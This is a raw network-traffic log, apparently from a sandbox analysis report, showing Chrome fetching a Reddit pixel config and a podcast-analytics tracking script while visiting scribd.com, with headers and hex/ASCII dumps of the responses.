                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: >QqhhL^cLixL21iT*ze:dwc^i\-j]F=}7GLZIf?=mhc~,0K^L9*lg'~kdC;hDUVr`,#nP`Ci??Q&(hFE`fNv,rI,&CdqBw/W
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1378INData Raw: 86 7f dc 58 06 db 6c 21 57 92 87 82 a8 6c f0 03 8c 05 da c0 ba b4 da c3 eb 1c fe a4 3d 18 f0 39 a4 a9 f0 6d 6b 68 7d 19 8a 61 d2 a6 f4 08 df 61 ab db 1b 50 c2 69 8f c1 ac 2f b0 b0 19 80 36 81 6f 1a f1 40 00 b2 54 c6 19 b6 2c 0b 16 2a 7d 90 8d 85 89 05 69 9f b7 e4 b9 45 a1 89 b8 29 90 4a cc 64 4d c7 a8 b8 1b f2 8f 7e b8 fc f6 3f 39 25 bc 7a 44 80 ea eb bf 56 38 7a 84 34 0a eb 3f c9 9f 16 fe 22 10 f1 19 9a be 85 8a 58 6d 1c cb 53 f8 10 50 26 1b fc f7 86 0c a3 5b be 86 6c 58 b8 de 02 2a 42 28 59 60 35 d3 d4 9d 95 8c 04 29 fd c0 8b 1c 4d 3a e4 ed 05 61 4e 26 a9 5a 45 d1 95 0a 41 da 34 b9 da fa 4e 82 bb 06 85 a1 c8 3d 1a b9 9f 1b 01 99 73 f2 09 01 85 de d6 33 29 1c 36 42 b2 18 ff 56 73 e9 7b 89 29 0d d3 57 74 50 3e eb 4a 7a 1a a6 23 fc c0 7d 5a 3f 93 90 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Xl!Wl=9mkh}aaPi/6o@T,*}iE)JdM~?9%zDV8z4?"XmSP&[lX*B(Y`5)M:aN&ZEA4N=s3)6BVs{)WtP>Jz#}Z?
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1378INData Raw: 5b c9 ce f5 fc bd 64 a8 3b 72 8e bd ee 8e 87 17 f2 af dc 46 cf 2e 07 e3 94 f5 27 1d 13 99 6d 9f 4e a8 c3 d9 0a 1a 7d b9 05 ae 14 26 1a 96 dd 52 ce e3 b2 d0 89 75 7a 6f 56 90 c6 8e 13 b6 08 f2 2c 91 a5 de ce 6e 47 72 9b d0 2b cb a4 b3 8a 3e 45 d8 4c ee 9e 53 1f ae 44 1c 97 83 81 22 4c 22 23 b4 d5 e7 4e 90 2d c7 a1 81 94 0b b6 6c 70 38 2f 2b 2c 36 bb de 5f 0e ba fd ba 32 6d 34 65 64 fb 2c 95 20 2c 93 b0 67 d6 1f 74 19 50 3c e5 7a 60 2b 7d 94 8d d4 24 2b 8e e1 f8 be 35 5a d8 07 54 e9 0c 4a ac d7 36 c6 fb 49 ff 96 37 06 e2 16 b6 1a 68 17 66 a0 75 04 53 ac ff cb b0 bb df 2f 7f 6e 1b 1d c3 76 e3 59 7c c7 63 64 27 75 18 70 0e 73 f4 1c 0e 8b 67 d3 b9 ec b4 a5 66 98 3e ea c2 4f 30 9b 07 38 19 38 30 9f a4 a7 97 b3 57 0b c8 ac d5 36 1d 1e 21 79 0b 7d 33 08 dc 4e 5b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [d;rF.'mN}&RuzoV,nGr+>ELSD"L"#N-lp8/+,6_2m4ed, ,gtP<z`+}$+5ZTJ6I7hfuS/nvY|cd'upsgf>O0880W6!y}3N[
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1378INData Raw: 52 62 41 3c 3f 16 cc 6c f0 19 19 9d 08 db 90 6c 20 d8 90 32 9e 95 90 6e 4a d6 43 88 5d 6c 68 de 20 16 da 6d 1a 08 59 4a 5f b9 49 40 6a f2 5b 4c 26 e6 27 65 ec 8f fb 6a fa ab 84 2d db 3a 50 1e 29 31 d1 ce 1c 76 b3 c5 f0 6f 39 ac 44 09 05 ea bb 63 56 2f d0 39 88 ba 0d ea 4d dd b2 68 02 83 d5 fe c4 40 64 ae ff b9 00 07 6d 12 c1 a4 6a 53 9f ef e2 71 6d 5d 58 63 90 e0 11 c1 66 85 8f 2b 93 5a 44 e0 a4 28 62 9b 8b a0 c2 ea 41 5e 91 44 5b 4c 8a 48 5b c8 52 06 55 82 63 05 2a e1 fd be 52 61 88 e0 b4 79 57 58 74 19 92 70 a8 4b 79 dd e7 14 f2 aa 05 b2 74 6d 8a 28 8d c6 90 64 4c a6 36 1b 4b 62 16 b1 31 7e 3f 3e c9 05 88 3f 85 4b 3a 12 ca d7 f2 ca 2f 58 9c e2 6c d4 54 f2 a5 1b 2f 63 0a 2b f9 ab e6 c8 0e f3 fb 00 ac 1c 0e 3e 80 bf 2a d9 c6 6c ff c4 57 b2 e4 2f a5 58 5b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RbA<?ll 2nJC]lh mYJ_I@j[L&'ej-:P)1vo9DcV/9Mh@dmjSqm]Xcf+ZD(bA^D[LH[RUc*RayWXtpKytm(dL6Kb1~?>?K:/XlT/c+>*lW/X[
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1378INData Raw: 62 f5 10 f6 47 77 64 c4 99 9c a0 69 f1 06 d9 77 1e 50 58 82 3f ba d3 b1 97 f3 ab 4c 82 75 49 0c c7 17 13 2f af 2d 93 92 a5 6c b9 0f b6 dd 69 9e 44 e2 c7 96 72 47 4f 99 c0 7b 14 91 b8 9e ab 24 4d 61 ad a6 32 cf 28 af 93 ea 1c 9d b0 95 e4 c9 16 20 5c 2e 9b f4 85 e4 95 50 48 4a d2 84 42 2c 64 ea db eb f0 4d 94 01 4f 36 1d be 87 d2 e1 49 a6 7b 6b 09 81 29 41 f9 cf f1 fe 0f ce ae b5 d5 4f 69 4e b1 71 02 c7 41 c8 b4 08 0f ba 2b 70 4c 47 09 05 6b 76 8d 1a 0a 44 5a 0f 33 a2 26 10 0a 3a 96 25 7c cd 23 28 69 eb 7e 62 44 95 87 70 61 32 0f 6d 11 97 c9 03 83 44 63 d7 5e ae 52 7f 32 57 5d 32 0e d5 da 4e a5 13 a2 13 0b ce 98 33 e0 30 6b a0 35 4f a5 ed bd 64 a0 bc 0a c7 7b 3b 62 45 13 b6 7e ca 8b a3 87 18 38 ea 4d e5 ba 97 46 1b 9f 6f 55 56 86 01 11 11 db 95 a5 22 d9 7e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bGwdiwPX?LuI/-liDrGO{$Ma2( \.PHJB,dMO6I{k)AOiNqA+pLGkvDZ3&:%|#(i~bDpa2mDc^R2W]2N30k5Od{;bE~8MFoUV"~
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1378INData Raw: 6b 68 e0 8b 6a 94 06 04 80 1f 97 06 44 0d 3f b4 e7 31 ca ff 22 49 9a 89 79 f3 c9 02 b7 36 03 e9 54 63 92 45 8c 08 93 4b bc 49 ed 04 06 e6 fc 46 2d 54 3a 5d 27 a7 d6 b8 d5 69 1c f1 7b 81 1b 5d 2e 98 67 e0 58 a8 0c 0e ee a4 98 10 30 a5 dc 20 5b 72 d8 80 16 a3 ca 36 44 d7 6a bf 73 e4 2a 1d 64 11 03 b2 5c 29 2b ba b1 eb 6a 35 f6 62 4e 10 9c 2a 30 f3 5c 7d 85 82 5c 5a 71 97 30 c0 53 bc 38 e4 e4 1a 04 ac b5 78 ae 1d 04 19 5a 5e 04 12 a7 8e f7 40 92 6b f1 7b 7d 36 f9 37 bb 1f 92 6b 1d b6 7d fb 0a ee 2a c3 58 21 80 65 8b c4 5c e4 b2 55 3b 13 ad 2b 49 7f 57 b6 59 b4 1c 2e f1 ee 23 20 cb 40 15 e6 89 a4 0d 29 31 4b 12 e6 03 13 ca c9 e4 ab ab d6 25 94 70 21 55 94 27 e8 4d b3 ad 7b 3f 99 cc f4 5e 91 d4 67 2c 25 7f 2c 22 fa 34 b5 bd cf ff 45 d8 0d 7d fe bd 88 ee 92 f3
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: khjD?1"Iy6TcEKIF-T:]'i{].gX0 [r6Djs*d\)+j5bN*0\}\Zq0S8xZ^@k{}67k}*X!e\U;+IWY.# @)1K%p!U'M{?^g,%,"4E}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1196INData Raw: 77 d9 9d 3e 9f f4 07 fb b3 74 68 bc 41 0d f2 ad a2 21 30 19 1e 1e 3f de 7b fa e4 59 a1 5c 82 f0 cf b3 e2 f1 93 47 8d a7 72 14 38 e4 65 32 75 6f b7 28 d2 27 df 3d 6e ec d5 d6 d6 09 43 45 57 63 05 7d af 94 be 7f 82 8a d8 cb 02 2a 7b a9 2a 23 2c 19 3d 9e b7 bd 0c 47 ea 78 58 8e c7 f0 d6 67 49 0d 7c 99 9d b5 74 44 b3 e7 93 ab ab 2e 26 c9 6f c2 53 fa eb 2b ad 89 11 70 6f b4 66 5a 00 22 f9 15 80 24 72 87 78 27 1f 72 5d 51 8e a7 f6 ac 82 5e 2f 6b 61 46 92 20 11 39 9e d5 33 80 29 02 4c 01 60 69 ee 8c 32 02 b3 63 00 af bc ea 94 47 8e e6 6a 92 ae 23 b4 4e 39 9a 12 d2 e5 99 86 ed 80 8b 06 f1 2e 47 28 b6 6e 62 71 f7 30 92 52 e4 98 43 4e 7e 38 9a 74 67 aa 58 26 92 31 e2 0b 4a a8 5b b6 08 0c 98 cb 21 1c 64 2b ff 9a 0c 08 f1 15 99 65 25 11 25 6c 4a 58 af 44 f5 46 e8 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: w>thA!0?{Y\Gr8e2uo('=nCEWc}*{*#,=GxXgI|tD.&oS+pofZ"$rx'r]Q^/kaF 93)L`i2cGj#N9.G(nbq0RCN~8tgX&1J[!d+e%%lJXDFe


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        80192.168.2.1649818151.101.1.1404436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC574OUTGET /pixels/t2_9t33vcn2/config HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: pixel-config.reddit.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC253INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 27
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC27INData Raw: 1f 8b 08 00 00 00 00 00 00 ff aa ae e5 02 04 00 00 ff ff 06 b0 a1 dd 03 00 00 00
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        81192.168.2.164981935.244.142.804436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC346OUTGET /ping.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: cdn.pdst.fm
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC835INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-generation: 1719323749654301
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-stored-content-length: 22096
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-hash: crc32c=NZyeaA==
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-hash: md5=Tt3uyVr9qWmz0bL7lwwesQ==
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 22096
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: Content-Type
                                                                                                                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC7gDaydO7nZFLUoV_5iM-1SpURFbPB9hh4FIB_kJOptW19P3bzHzTSt0_PyvcMQTxctlyy6StCz4g
                                                                                                                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:48:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Fri, 06 Dec 2024 22:48:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                                                                                                                                                                        Age: 654
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 25 Jun 2024 13:55:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "4eddeec95afda969b3d1b2fb970c1eb1"
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC555INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 32 32 38 3a 74 3d 3e 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 65 3d 22 7e 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 2c 6e 2c 65 29 7b 74 68 69 73 2e 66 6e 3d 74 2c 74 68 69 73 2e 63 6f 6e 74 65 78 74 3d 6e 2c 74 68 69 73 2e 6f 6e 63 65 3d 65 7c 7c 21 31 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 6e 2c 72 2c 69 2c 63 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 72 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 6c 69 73 74 65 6e 65 72 20 6d 75 73 74 20 62 65 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 76 61 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (()=>{"use strict";var t={228:t=>{var n=Object.prototype.hasOwnProperty,e="~";function r(){}function o(t,n,e){this.fn=t,this.context=n,this.once=e||!1}function i(t,n,r,i,c){if("function"!=typeof r)throw new TypeError("The listener must be a function");var
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 28 6e 65 77 20 72 29 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 28 65 3d 21 31 29 29 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2e 65 76 65 6e 74 4e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 72 2c 6f 3d 5b 5d 3b 69 66 28 30 3d 3d 3d 74 68 69 73 2e 5f 65 76 65 6e 74 73 43 6f 75 6e 74 29 72 65 74 75 72 6e 20 6f 3b 66 6f 72 28 72 20 69 6e 20 74 3d 74 68 69 73 2e 5f 65 76 65 6e 74 73 29 6e 2e 63 61 6c 6c 28 74 2c 72 29 26 26 6f 2e 70 75 73 68 28 65 3f 72 2e 73 6c 69 63 65 28 31 29 3a 72 29 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 3f 6f 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ype=Object.create(null),(new r).__proto__||(e=!1)),u.prototype.eventNames=function(){var t,r,o=[];if(0===this._eventsCount)return o;for(r in t=this._events)n.call(t,r)&&o.push(e?r.slice(1):r);return Object.getOwnPropertySymbols?o.concat(Object.getOwnPrope
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 70 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 70 5d 3b 66 5b 73 5d 2e 66 6e 2e 61 70 70 6c 79 28 66 5b 73 5d 2e 63 6f 6e 74 65 78 74 2c 61 29 7d 7d 72 65 74 75 72 6e 21 30 7d 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 72 65 74 75 72 6e 20 69 28 74 68 69 73 2c 74 2c 6e 2c 65 2c 21 31 29 7d 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 72 65 74 75 72 6e 20 69 28 74 68 69 73 2c 74 2c 6e 2c 65 2c 21 30 29 7d 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 69 3d 65 3f 65 2b 74 3a 74 3b 69 66 28 21 74 68 69 73 2e 5f 65 76 65 6e 74 73 5b 69 5d 29 72 65 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: p-1]=arguments[p];f[s].fn.apply(f[s].context,a)}}return!0},u.prototype.on=function(t,n,e){return i(this,t,n,e,!1)},u.prototype.once=function(t,n,e){return i(this,t,n,e,!0)},u.prototype.removeListener=function(t,n,r,o){var i=e?e+t:t;if(!this._events[i])ret
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 67 28 31 36 29 2e 73 6c 69 63 65 28 31 29 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 74 2c 6e 3d 30 29 7b 72 65 74 75 72 6e 20 63 5b 74 5b 6e 2b 30 5d 5d 2b 63 5b 74 5b 6e 2b 31 5d 5d 2b 63 5b 74 5b 6e 2b 32 5d 5d 2b 63 5b 74 5b 6e 2b 33 5d 5d 2b 22 2d 22 2b 63 5b 74 5b 6e 2b 34 5d 5d 2b 63 5b 74 5b 6e 2b 35 5d 5d 2b 22 2d 22 2b 63 5b 74 5b 6e 2b 36 5d 5d 2b 63 5b 74 5b 6e 2b 37 5d 5d 2b 22 2d 22 2b 63 5b 74 5b 6e 2b 38 5d 5d 2b 63 5b 74 5b 6e 2b 39 5d 5d 2b 22 2d 22 2b 63 5b 74 5b 6e 2b 31 30 5d 5d 2b 63 5b 74 5b 6e 2b 31 31 5d 5d 2b 63 5b 74 5b 6e 2b 31 32 5d 5d 2b 63 5b 74 5b 6e 2b 31 33 5d 5d 2b 63 5b 74 5b 6e 2b 31 34 5d 5d 2b 63 5b 74 5b 6e 2b 31 35 5d 5d 7d 63 6f 6e 73 74 20 61 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 69 66 28 6e 2e 72 61 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: g(16).slice(1));function u(t,n=0){return c[t[n+0]]+c[t[n+1]]+c[t[n+2]]+c[t[n+3]]+"-"+c[t[n+4]]+c[t[n+5]]+"-"+c[t[n+6]]+c[t[n+7]]+"-"+c[t[n+8]]+c[t[n+9]]+"-"+c[t[n+10]]+c[t[n+11]]+c[t[n+12]]+c[t[n+13]]+c[t[n+14]]+c[t[n+15]]}const a=function(t,e,r){if(n.ran
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 6e 28 6e 2c 65 29 7b 72 65 74 75 72 6e 20 6e 5b 65 5d 3d 74 2e 66 69 65 6c 64 73 5b 65 5d 28 74 5b 65 5d 29 2c 6e 7d 29 2c 7b 7d 29 7d 7d 2c 74 7d 28 29 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 3f 74 3a 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 3f 74 2e 74 6f 53 74 72 69 6e 67 28 29 3a 6e 75 6c 6c 7d 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 70 61 72 73 65 49 6e 74 28 74 2c 31 30 29 3b 72 65 74 75 72 6e 20 69 73 4e 61 4e 28 6e 29 3f 6e 75 6c 6c 3a 6e 7d 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: n(n,e){return n[e]=t.fields[e](t[e]),n}),{})}},t}(),w=function(){return function(t){return"string"==typeof t?t:"number"==typeof t?t.toString():null}},m=function(){return function(t){var n=parseInt(t,10);return isNaN(n)?null:n}},g=function(){return functio
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 74 5b 6f 5d 3d 6e 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 74 7d 2c 54 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 3b 63 6f 6e 73 74 20 45 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 29 7b 76 61 72 20 65 3d 74 2e 63 61 6c 6c 28 74 68 69 73 29 7c 7c 74 68 69 73 3b 65 2e 61 63 74 69 6f 6e 3d 22 76 69 65 77 22 3b 76 61 72 20 72 3d 53 28 7b 73 6f 75 72 63 65 3a 77 28 29 2c 70 6c 61 63 65 6d 65 6e 74 3a 77 28 29 2c 66 72 6f 6d 3a 77 28 29 7d 29 3b 65 2e 66 69 65 6c 64 73 3d 54 28 7b 75 72 6c 3a 77 28 29 2c 72 65 66 65 72 72 65 72 3a 77 28 29 2c 69 6e 49 66 72 61 6d 65 3a 62 28 29 2c 77 69 6e 64 6f 77 57 69 64 74 68 3a 6d 28 29 2c 77 69 6e 64 6f 77 48 65 69 67 68 74 3a 6d 28 29 2c 74 69 6d 65 7a 6f 6e 65 4f 66
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: t[o]=n[o]);return t},T.apply(this,arguments)};const E=function(t){function n(n){var e=t.call(this)||this;e.action="view";var r=S({source:w(),placement:w(),from:w()});e.fields=T({url:w(),referrer:w(),inIframe:b(),windowWidth:m(),windowHeight:m(),timezoneOf
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 65 6d 28 49 2c 66 28 29 29 2c 6e 3d 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 49 29 29 2c 74 3d 6e 7c 7c 22 30 22 7d 72 65 74 75 72 6e 20 74 7d 2c 56 3d 7b 75 73 65 72 3a 55 28 29 2c 73 65 73 73 69 6f 6e 3a 44 28 29 2c 70 61 67 65 3a 66 28 29 7d 3b 63 6f 6e 73 74 20 71 3d 56 3b 76 61 72 20 4c 3d 7b 7d 2c 4e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 6e 2c 65 3d 22 73 70 64 74 2d 22 2e 63 6f 6e 63 61 74 28 73 28 29 2c 22 2d 22 29 2e 63 6f 6e 63 61 74 28 28 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 31 65 33 29 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 6e 29 29 29 2c 72 3d 7b 6f 72 64 65 72 3a 30 2c 70 69 64 3a 71 2e 70 61 67 65 2c 73 69 64
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: em(I,f()),n=sessionStorage.getItem(I)),t=n||"0"}return t},V={user:U(),session:D(),page:f()};const q=V;var L={},N=function(t){if(!t)return!1;var n,e="spdt-".concat(s(),"-").concat((void 0===n&&(n=1e3),Math.floor(Math.random()*n))),r={order:0,pid:q.page,sid
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 2e 73 65 74 49 74 65 6d 28 22 70 61 72 74 6e 65 72 5f 75 73 65 72 5f 69 64 22 2c 6e 2e 70 61 72 74 6e 65 72 5f 75 73 65 72 5f 69 64 29 2c 65 2e 75 70 64 61 74 65 28 6e 29 2c 65 7d 72 65 74 75 72 6e 20 52 28 6e 2c 74 29 2c 6e 7d 28 6a 29 3b 76 61 72 20 48 3d 5b 5d 2c 7a 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 4c 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4c 5b 74 5d 7d 29 29 3b 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 29 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 6c 65 6e 67 74 68 3b 6e 2b 3d 31 29 7b 76 61 72 20 65 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .setItem("partner_user_id",n.partner_user_id),e.update(n),e}return R(n,t),n}(j);var H=[],z=function(t){var n=function(){var t=Object.keys(L).map((function(t){return L[t]}));if(window.localStorage)for(var n=0;n<localStorage.length;n+=1){var e=localStorage.
